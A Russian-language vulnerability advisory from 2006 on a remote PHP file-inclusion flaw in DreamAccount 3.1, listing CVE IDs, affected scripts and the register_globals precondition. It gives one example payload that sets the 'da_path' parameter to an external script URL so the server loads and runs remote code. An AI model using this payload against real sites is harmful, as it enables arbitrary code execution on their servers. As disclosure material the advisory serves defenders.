PHP-инклюдинг в DreamAccount

Дата публикации:
14.06.2006
Дата изменения:
14.06.2006
Всего просмотров:
885
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2006-2881
CVE-2006-6232
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
DreamAccount 3.x
Уязвимые версии: DreamAccount 3.1, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "da_path" в сценариях "auth.cookie.inc.php", "auth.header.inc.php" и "auth.sessions.inc.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

da_path=http://www.yourspace.com/yourscript.php?

URL производителя: dreamcost.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: [MajorSecurity #8]DreamAccount <= 3.1 - Remote File Include Vulnerability

или введите имя

CAPTCHA